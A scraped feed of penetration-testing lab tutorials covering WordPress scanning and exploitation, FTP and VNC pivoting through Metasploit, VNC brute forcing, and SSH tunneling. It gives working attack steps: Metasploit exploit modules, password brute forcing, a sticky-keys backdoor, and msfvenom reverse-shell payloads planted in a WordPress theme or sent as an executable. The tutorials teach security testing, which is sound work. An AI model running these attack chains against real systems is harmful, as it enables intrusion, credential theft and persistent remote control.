 Here it found server: Apache/2.4.7, PHP /5.5.9 wordpress version 4.8.1, using this information an attacker can check for its exploit in Google. Moreover it also found that the upload directory has directory listing enable which means anyone can browse the directory /wp-content/uploads to view the uploaded files and contents.


A theme controls the general look and feel of website including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its user and each theme has an about page that includes features and instructions.

To scan installed theme of wordpress website type following command:
./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate t


After some time we successfully found Theme twentysevebteen –v1.3, last update, location of theme installed and etc as shown below.


Enumerating wordpress vulnerable Theme
To scan installed vulnerable theme of wordpress website type following command:
./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vt

From scanning result we didn’t find any vulnerable theme which means there is no vulnerable theme which can be exploited.


Plugins are small piece of code of a program which can be added to a WordPress website to extend its functionality.
                       
To find installed plugins on our target’s WordPress website, type in terminal:
./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate p





Now type following command to scan vulnerable plug-in of any wordpress website:
./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vp





This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

Open the terminal load metasploit framework and execute following command:
use exploit/unix/webapp/wp_reflexgallery_file_upload
msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101
msf exploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/
msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From given image you can observe the meterpreter session of victim’s web server.
Meterpreter> sysinfo


Enumerating wordpress Usernames
In order to enumerate user names of wordpress website execute following command:



After sometime it will dump the table of usernames. In this scan I had found three users with their Id as given below:
ID 1: admin
ID2: ignite
ID: demo


Whatever we have scanned above can be easily enumerate at once by executing given below command:
./wpscan.rb –u http://192.168.0.101/wordpress/ -e at –e ap –e u

Here we had use option –e at –e ap –e u for following reasons:

–e at : enumerate all themes of targeted website
–e ap: enumerate all plugins of targeted website
–e u: enumerate all usernames of targetd website



Brute force attack using Wpscan
With help of username which we had enumerated above we can create a wordlist of password for user admin and can try brute force login attack using given below command.
./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt –username admin






You can use above credential for login into admin panel where we can upload any theme, taking advantage of admin right we will try to upload malicious script to achieve reverse connection from victim’s system.
Once you are inside admin panel click on Appearance from dashboard and then select option editor.




msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw
 From screenshot you can read the generated PHP script, at this instant we need to copy the text from *further we will past it inside wordpress template as a new theme.




use exploit/multi/handler
 msf exploit(handler) >set payload php/meterpreter/reverse_tcp
msf exploit(handler) >set lhost 192.168.0.107
msf exploit(handler) >4444
msf exploit(handler) >exploit


http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php


Meterpreter> sysinfo

In this way using WPSCAN and METASPLOIT admin can check the strength and weakness of wordpress website.

FTP Pivoting through RDP

$
0
0
In our previous tutorial we had discussed on SSH pivoting & RDP pivoting and today you will learn FTP pivoting attack.
From Offensive Security
Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.
Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine:  window operating system with two network interface

Target Machine: window 7 (Allow FTP service)


Exploit pivot machine
Use exploit MS17-010 or multi handler to hack the pivot machine and bypass its UAC to achieve admin privileges.
sessions
 From given image you can confirm that I owned pivot machine (192.168.0.101) meterpreter session1.


Launch sticky key attack 
Here I need to make post exploit to launch sticky key attack 
Use post/windows/manage/sticky_keys
msf post(sticky_keys) > set session 1
msf post(sticky_keys) >exploit

Great!! It has successfully launched sticky attack in pivot machine and now we will utilize it later for establishing connection with target FTP server.


Enable RDP service
Open meterpreter session1 and type following command which will enable remote Desktop service in pivoted machine. 
Meterpreter> run getgui -e


Verify network interface of pivot
Check network interface through following command:
Meterpreter> ifconfig
From given image you can observe two networks interface in pivot’s system 1st for IP 192.168.0.101 through which attacker is connected and 2nd for IP 192.168.100.102 through which FTP server (targets) are connected.

Use autoroute post exploit
Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.100.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.100.0 network attacker need run the post exploitation “autoroute”.
This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.
use post/multi/manage/autoroute 
msf post(autoroute) > set session 1
msf post(autoroute) > exploit


Use Ping sweep post exploit
This module will perform IPv4 ping sweep using the OS included ping command.
use post/windows/gather/ping_sweep
msf post(ping_sweep) > set rhosts 192.168.100.1-110
msf post(ping_sweep) > set session 1
msf post(ping_sweep) > exploit
 Here we found a new host IP 192.1668.100.103 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

Use TCP Port Scanpost exploit
This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 21
msf auxiliary(tcp) > set rhosts 192.168.100.103
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) >exploit
From given you can observe port 21isopen and we know that 21 used for FTP services.

FTP Login Brute Force
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 192.168.100.103
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit
From given image you can observe t it is showing matching combination of username: raj and password: 123 for login.


Connect to pivot through RDP
Open new terminal in kali Linux and type following command to connect with pivot machine through RDP service
  rdesktop 192.168.0.101


If you remember we had lunched sticky attack above which will open command prompt on logon screen when you will hit 5 times shift key.
Now press 5 times shift key then you will get command prompt and type “start iexplore.exe” which will lunch Internet Explore.


Connect with FTP server
Execute following URL in browser for FTP connection:
 Now enter the credential which we had found through FTP login brute force attack i.e. raj: 123


Congrats!!!  We are successfully connected with FTP server through pivot machine.

VNC Penetration Testing

$
0
0
Welcome to Internal penetration testing on VNC server where you will learn VNC installation and configuration, enumeration and attack, system security and precaution.
From Wikipedia
 Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction. It uses port 5900: VNC and 5901: VNC-1.
Penetration Lab Requirements
VNC Server: ubuntu
Attacker system: Kali Linux
Client system: window (tightVNC view)

Let’s start!!

VNC Installation

Open the terminal and follow the given below steps by executing given command for VNC installation. 
Given below command will installs the desktop, Unity, as well as several packages that are required for the graphical interface to work properly.


sudo apt-get install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal


Now type following command for VNC server installation.
sudo apt-get install vnc4server

Given below command will reset your server password that is required for VNC login
sudo vncpasswd

The password should minimum 6 digits; here I had set server password: 098765 for VNC authentication.


Type given below command to run VNC
sudo vncserver :1

It is required to kill the process if you want to make some changes in running VNC server.
sudo vncserver -kill :1

Now type following command in order to open VNC startup file for making some changes.
sudo gedit ~/.vnc/xstartup


Add given below line in startup file as shown in given and save the changes.
exec gnome-session &
exec gnome-panel &
exec  gnome-settings-daemon &
exec metacity &


Execute given below command to set resolution of Desktop screen.
sudo vncserver :1 -geometry 1024x768 -depth 24

After following above 7 steps check service status of VNC server using given below command.
sudo netstat -tnl |grep 5901
From given image you can confirm that port 5901 is activated


Connecting window Client to VNC server
TightVNCis a free remote control software package that help client to connect with VNC server. I have downloadedit in client machine so that he can connect to vnc server.

Run TightVNC Viewer and enter [192.168.1.218:5901] server IP: port number as shown in given image and then click on connect.

Client will get VNC authentication Popup enter the server password which you have set above.


From given image you can observe that window client has connected to ubuntu server and access his Desktop and could control it mouse and keyboard.


Scanning Target IP for Enumeration
Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.
Here we are using nmap for scanning port and protocols. 
nmap -sT 192.168.1.218
If service is activated in targeted server then nmap show open STATE for port 5901.

Use nmap script for VNC version

Following nmap command will Queries a VNC server for its protocol version and supported security types.

nmap -p 5901 --script vnc-info 192.168.1.218

From given below image you can conclude that it has shown protocol version 3.8 and security type: VNC authentication 2.


Use nmap script for VNC brute force attack

Following nmap command willPerforms brute force password auditing against VNC server using dictionary for password.

nmap -p 5901 --script vnc-brute 192.168.1.218 --script-args passdb=/root/desktop/pass.txt

Great!! From given below image you can read the valid password: 098765


Use Metasploit for VNC brute force attack

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login
 msf auxiliary(vnc_login) >set rhosts 192.168.1.218
msf auxiliary(vnc_login) >set rport 5901
msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run

Awesome!! From given below image you can observe the same password: 098765have been found by metasploit.


Attacker connecting VNC server
Open a new terminal and type following command for connecting with VNC server using above password 098765
vncviewer 192.168.1.218:5901

Nice!! You can see after making successfully brute force attack an attacker can easily connect with vnc server.


Capture VNC Session of window Remote system using Msfvenom
Create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.
Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > /var/www/html/vnc.exe
 Now the above command will generate an exe file for the VNC payload in /var/www/html of Kali Linux.

 Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.
msfconsole
use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.216
msf exploit(handler) > set lport 4455
msf exploit(handler) > set viewonly false
msf exploit(handler) > run

Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

Here you can see desktop screen of victim’s pc through will attacker is connected.

 Another way toCapture VNC Session of window Remote system
Suppose you have already exploited any window system and got victim’s system reverse connection through meterpreter session. 
Type given below command which will inject a VNC Dll via a reflective loader (staged). Connect back to the attacker.

Meterpreter > run vnc


Great!! Again attacker is connected to victim’s system


Secure VNC server through port forwarding
Open vnserver setup file using given blow command:
sudo gedit /usr/bin/vncserver


Follow given below step for making changes
Add # to comment “vncport = 5900” 
Add a new line as shown in given image for forwarding VNC service as vncPort = 8800;


Now try to connect with vnc server through port 8800 as connected above through tighvnc viewer and enter the password.


Hence you can see the vnc connection has been established successfully.

VNC tunneling over SSH

$
0
0
In previous article we had perform VNC penetration testingand today you will VNC tunneling to connect remote machine with VNC server when they both belongs different network interface.

Basically tunneling is process which allows data sharing or communication between two different networks privately. Tunneling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data. 

Let’s Begin!!

Requiremet:
Server machine(ubuntu):  Two network interface with activted SSH service
Local machine (ubuntu): activated VNC service
Remote machine(window):  with install tight VNC viewer


In following image we are trying to explain VNC tunneling process where a remote PC of IP 192.168.1.225 is trying to connect to 10.0.0.20 which is on INTRANET of another network. To establish connection with local machine, remote PC will create VNC tunnel which will connect with the local system via SSH server machine.



Given image below is describing the network configuration for server machine (SSH) where it is showing two IP 192.168.1.226 and another 10.0.0.10 as explain above.


Another image given below is describing network configuration for local machinewhich is showing IP 10.0.0.20


Checking activated VNC service using following command:
 netstat -tlp
Hence from given image you can see the highlighted text is showing 5900 is enabled in local machine.


Open the terminal and type using following command to connecting to VNC machine (IP: 10.0.0.20) through server machine (IP: 10.0.0.10).
vncviewer 10.0.0.20


Great!! Local machine successfully connected


Similarly Using tight vnc viewer remote machine (192.168.1.225) now trying to connect local machine (IP: 10.0.0.10) as shown in given image

Since they belong to different network therefore he receives network error.


Follow given below step to connect remote machine to local machine via ssh server.
·         Open tightVNC connection and enter the local machine IP: 10.0.0.20 with port 5900.
·         EnableSSH tunneling
·         Now enter ssh server IP: 192.168.1.226 with port 22and ssh server username: ubutnu.
Congrats!!!Remote machine had successfully connected with local machine through VNC.

VNC Pivoting through Meterpreter

$
0
0
In privous article we had describe VNC peneration testing and VNC tunneling through SSH but today we are going to demonstrate VNC pivoting.

From Offensive Security
Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.
Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine:  ubuntu operating system with two network interface

Target Machine: ubuntu (Allow VNC service)


Exploit pivot machine
Generate payload using msfvenom start multi/handler to hack the pivot machine (ubuntu) read complete article fromhere and bypass its UAC to achieve admin privileges.
sessions
 From given image you can confirm that I owned pivot machine (192.168.1.226) meterpreter session.

Verify network interface of pivot

Check network interface through following command:
Meterpreter> ifconfig
From given image you can observe two networks interface in pivot’s system 1st for IP 192.168.1.226 through which attacker is connected and 2nd for IP 10.0.0.1 through which VNC server (targets) are connected.


Use autoroute post exploit

Since attacker belongs to 192.168.1.1 interface and client belongs to 10.0.0.0interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 10.0.0.0 network attacker need run the post exploitation “autoroute”.
use post/multi/manage/autoroute 
msf post(autoroute) > set session 3
msf post(autoroute) > exploit


Use ARP Sweep to identify Active host
This module will enumerate alive Hosts in local network using ARP requests. Take help from target network interface 3 as shown above for MAC address and other details.

Use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) >set rhost 10.0.0.1-254
msf auxiliary(arp_sweep) >set shost
msf auxiliary(arp_sweep) >set smac 00:0c:29:bf:43:94
msf auxiliary(arp_sweep) >run

Here we found a new host IP 10.0.0.20 as shown in given image. Let’s perform TCP port scan for activated services on this machine.


Use TCP Port Scan post exploit

This module will enumerate open TCP port of target system.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 10.0.0.20
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) >exploit
From given you can observe port 5900 is open and we know that 5900 used for VNC services.

VNC brute force attack

In order to steal password for making unauthorized access in VNC machine apply Brute force attack using password dictionary in given below exploit.
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) >set rhosts 10.0.0.20
msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run
Awesome!! From given below image you can observe the same password: 123456 have been found by metasploit.

VNC Port forwarding on Local port
Now Type following command for port forwarding on localhost.
 Meterpreter> portfwd add –l  6000 –p 5900 –r 10.0.0.20
-l: This is a local port to listen on.
-p: The remote port to connect on.
-r:  The remote host address to connect on.

Now open the terminal and type following command to connect target machine:
vncviewer 127.0.0.1:6000
Wonderful!! We had successfully exploit VNC client by making unauthorized access.

Viewing all 1812 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>